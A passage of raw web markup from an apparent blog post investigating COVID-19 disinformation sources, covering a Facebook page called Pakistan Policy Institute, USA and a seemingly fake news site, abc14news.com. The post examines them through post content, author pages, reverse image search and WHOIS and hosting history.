href="https://substackcdn.com/image/fetch/$s_!OfV6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9b13260-3684-409c-8fe1-209069c7439a_800x333.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OfV6!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9b13260-3684-409c-8fe1-209069c7439a_800x333.png 424w, https://substackcdn.com/image/fetch/$s_!OfV6!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9b13260-3684-409c-8fe1-209069c7439a_800x333.png 848w, https://substackcdn.com/image/fetch/$s_!OfV6!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9b13260-3684-409c-8fe1-209069c7439a_800x333.png 1272w, https://substackcdn.com/image/fetch/$s_!OfV6!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9b13260-3684-409c-8fe1-209069c7439a_800x333.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OfV6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9b13260-3684-409c-8fe1-209069c7439a_800x333.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/e9b13260-3684-409c-8fe1-209069c7439a_800x333.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!OfV6!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9b13260-3684-409c-8fe1-209069c7439a_800x333.png 424w, https://substackcdn.com/image/fetch/$s_!OfV6!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9b13260-3684-409c-8fe1-209069c7439a_800x333.png 848w, https://substackcdn.com/image/fetch/$s_!OfV6!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9b13260-3684-409c-8fe1-209069c7439a_800x333.png 1272w, https://substackcdn.com/image/fetch/$s_!OfV6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9b13260-3684-409c-8fe1-209069c7439a_800x333.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Dr. Gholam Mujtaba Wikipedia Reference List</figcaption></figure></div><p>While this account is questionable, one linked to him seems to have more of an agenda in what they are publishing. Pakistan Policy Institute, USA, is an organization that allegedly seeks to help bring US and Pakistan relations to a more equitable position for both countries. Some of the verbiage listed in the About section of the Pakistan Policy Institute, USA Facebook page in conjunction with the link to a registered website with nothing to load, makes me skeptical.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Yh6R!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc37645af-df48-4f6b-9ad1-986c3f7be257_668x998.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Yh6R!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc37645af-df48-4f6b-9ad1-986c3f7be257_668x998.png 424w, https://substackcdn.com/image/fetch/$s_!Yh6R!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc37645af-df48-4f6b-9ad1-986c3f7be257_668x998.png 848w, https://substackcdn.com/image/fetch/$s_!Yh6R!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc37645af-df48-4f6b-9ad1-986c3f7be257_668x998.png 1272w, https://substackcdn.com/image/fetch/$s_!Yh6R!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc37645af-df48-4f6b-9ad1-986c3f7be257_668x998.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Yh6R!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc37645af-df48-4f6b-9ad1-986c3f7be257_668x998.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/c37645af-df48-4f6b-9ad1-986c3f7be257_668x998.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Yh6R!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc37645af-df48-4f6b-9ad1-986c3f7be257_668x998.png 424w, https://substackcdn.com/image/fetch/$s_!Yh6R!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc37645af-df48-4f6b-9ad1-986c3f7be257_668x998.png 848w, https://substackcdn.com/image/fetch/$s_!Yh6R!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc37645af-df48-4f6b-9ad1-986c3f7be257_668x998.png 1272w, https://substackcdn.com/image/fetch/$s_!Yh6R!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc37645af-df48-4f6b-9ad1-986c3f7be257_668x998.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Pakistan Policy Institute, USA About page on Facebook</figcaption></figure></div><p>The part in this about the US being Pro-India is awkward. Understanding that India and Pakistan have a tumultuous relationship at best still sets off alarms as to why this person who is affiliated with this organization would be sharing COVID-19 propaganda. Diving a little further into the posts for this page, we see a couple of alarming samples not relevant to COVID.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!FJD4!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F37a65550-ba65-4eac-aa09-e5a638538551_800x907.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!FJD4!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F37a65550-ba65-4eac-aa09-e5a638538551_800x907.png 424w, https://substackcdn.com/image/fetch/$s_!FJD4!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F37a65550-ba65-4eac-aa09-e5a638538551_800x907.png 848w, https://substackcdn.com/image/fetch/$s_!FJD4!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F37a65550-ba65-4eac-aa09-e5a638538551_800x907.png 1272w, https://substackcdn.com/image/fetch/$s_!FJD4!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F37a65550-ba65-4eac-aa09-e5a638538551_800x907.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!FJD4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F37a65550-ba65-4eac-aa09-e5a638538551_800x907.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/37a65550-ba65-4eac-aa09-e5a638538551_800x907.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!FJD4!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F37a65550-ba65-4eac-aa09-e5a638538551_800x907.png 424w, https://substackcdn.com/image/fetch/$s_!FJD4!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F37a65550-ba65-4eac-aa09-e5a638538551_800x907.png 848w, https://substackcdn.com/image/fetch/$s_!FJD4!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F37a65550-ba65-4eac-aa09-e5a638538551_800x907.png 1272w, https://substackcdn.com/image/fetch/$s_!FJD4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F37a65550-ba65-4eac-aa09-e5a638538551_800x907.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">Facebook post from Pakistan Policy Institute, USA</figcaption></figure></div><p>Admittedly, some of this does not make sense to me. The mention of Germany and the <em>female to bow down on the threshold of non-Allah</em> confuse me. I know this is a rough translation, but I lack the context to know what this has to do with COVID-19. I am unsure as to why New Jersey is mentioned. The final highlighted section seems to be counterproductive to what the About for this group says. This seems very Anti-India, which could be seen as a provocation, which fuels suspicion of a state actor maintaining these pages. The remainder of the posts reviewed were all about COVID-19, and some mentioned his son, who is a doctor in a New York hospital.</p><p>Traveling back to searching for phrases in Sample 2 to attempt to verify any validity to the statements led me to another source of disinformation. This site attempts to look like a real news station.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!FbmM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fde50566a-dc75-417c-8b40-9b958681ac9e_800x668.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!FbmM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fde50566a-dc75-417c-8b40-9b958681ac9e_800x668.png 424w, https://substackcdn.com/image/fetch/$s_!FbmM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fde50566a-dc75-417c-8b40-9b958681ac9e_800x668.png 848w, https://substackcdn.com/image/fetch/$s_!FbmM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fde50566a-dc75-417c-8b40-9b958681ac9e_800x668.png 1272w, https://substackcdn.com/image/fetch/$s_!FbmM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fde50566a-dc75-417c-8b40-9b958681ac9e_800x668.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!FbmM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fde50566a-dc75-417c-8b40-9b958681ac9e_800x668.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/de50566a-dc75-417c-8b40-9b958681ac9e_800x668.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!FbmM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fde50566a-dc75-417c-8b40-9b958681ac9e_800x668.png 424w, https://substackcdn.com/image/fetch/$s_!FbmM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fde50566a-dc75-417c-8b40-9b958681ac9e_800x668.png 848w, https://substackcdn.com/image/fetch/$s_!FbmM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fde50566a-dc75-417c-8b40-9b958681ac9e_800x668.png 1272w, https://substackcdn.com/image/fetch/$s_!FbmM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fde50566a-dc75-417c-8b40-9b958681ac9e_800x668.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">ABC14News landing page</figcaption></figure></div><p>While this looks like a news station, something is noticeably missing: the other journalists. Brandon G. Jones wrote every single article. Clicking his name to see his profile and how to follow him on social media leads us to this:</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!j6_0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2149bb1e-b37d-430c-8f56-3ed476606a64_800x479.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!j6_0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2149bb1e-b37d-430c-8f56-3ed476606a64_800x479.png 424w, https://substackcdn.com/image/fetch/$s_!j6_0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2149bb1e-b37d-430c-8f56-3ed476606a64_800x479.png 848w, https://substackcdn.com/image/fetch/$s_!j6_0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2149bb1e-b37d-430c-8f56-3ed476606a64_800x479.png 1272w, https://substackcdn.com/image/fetch/$s_!j6_0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2149bb1e-b37d-430c-8f56-3ed476606a64_800x479.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!j6_0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2149bb1e-b37d-430c-8f56-3ed476606a64_800x479.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/2149bb1e-b37d-430c-8f56-3ed476606a64_800x479.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!j6_0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2149bb1e-b37d-430c-8f56-3ed476606a64_800x479.png 424w, https://substackcdn.com/image/fetch/$s_!j6_0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2149bb1e-b37d-430c-8f56-3ed476606a64_800x479.png 848w, https://substackcdn.com/image/fetch/$s_!j6_0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2149bb1e-b37d-430c-8f56-3ed476606a64_800x479.png 1272w, https://substackcdn.com/image/fetch/$s_!j6_0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F2149bb1e-b37d-430c-8f56-3ed476606a64_800x479.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">ABC14News&#8217; Author page</figcaption></figure></div><p>The URL says <code>abc14news.com/author/bob</code> instead of mentioning Brandon. I put a box where one would expect links to his Twitter, Facebook, and Email address. Attempting to move to the author&#8217;s directory to see if any other authors are listed redirects us to an article that starts with the word author. I tried a reverse image search for his picture, but nothing came up. A search for only produced ABC14news materials.</p><p>Looking at the WHOIS and hosting history, we see that it is registered through GoDaddy with Domain privacy enabled. A pattern in play since September 2019 shows that the site moves hosting providers about every month or two.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!hGOw!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0115a75e-be24-49cc-bf92-1afa67f46071_800x831.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!hGOw!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0115a75e-be24-49cc-bf92-1afa67f46071_800x831.png 424w, https://substackcdn.com/image/fetch/$s_!hGOw!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0115a75e-be24-49cc-bf92-1afa67f46071_800x831.png 848w, https://substackcdn.com/image/fetch/$s_!hGOw!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0115a75e-be24-49cc-bf92-1afa67f46071_800x831.png 1272w, https://substackcdn.com/image/fetch/$s_!hGOw!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0115a75e-be24-49cc-bf92-1afa67f46071_800x831.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!hGOw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0115a75e-be24-49cc-bf92-1afa67f46071_800x831.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/0115a75e-be24-49cc-bf92-1afa67f46071_800x831.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!hGOw!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0115a75e-be24-49cc-bf92-1afa67f46071_800x831.png 424w, https://substackcdn.com/image/fetch/$s_!hGOw!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0115a75e-be24-49cc-bf92-1afa67f46071_800x831.png 848w, https://substackcdn.com/image/fetch/$s_!hGOw!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0115a75e-be24-49cc-bf92-1afa67f46071_800x831.png 1272w, https://substackcdn.com/image/fetch/$s_!hGOw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0115a75e-be24-49cc-bf92-1afa67f46071_800x831.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a><figcaption class="image-caption">WHOIS data for ABC14News</figcaption></figure></div><p>As of the time of writing this, abc14news.com seems to be the only site on the IP address. Previous IP addresses have hosted a wide variety of sites in terms of content and credibility.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!XlE5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc49cfd48-7c8a-4a3e-b2d7-d27f9dc06026_800x412.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!XlE5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc49cfd48-7c8a-4a3e-b2d7-d27f9dc06026_800x412.png 424w, https://substackcdn.com/image/fetch/$s_!XlE5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc49cfd48-7c8a-4a3e-b2d7-d27f9dc06026_800x412.png 848w, https://substackcdn.com/image/fetch/$s_!XlE5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc49cfd48-7c8a-4a3e-b2d7-d27f9dc06026_800x412.png 1272w, https://substackcdn.com/image/fetch/$s_!XlE5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc49cfd48-7c8a-4a3e-b2d7-d27f9dc06026_800x412.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!XlE5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc49cfd48-7c8a-4a3e-b2d7-d27f9dc06026_800x412.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/c49cfd48-7c8a-4a3e-b2d7-d27f9dc06026_800x412.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" 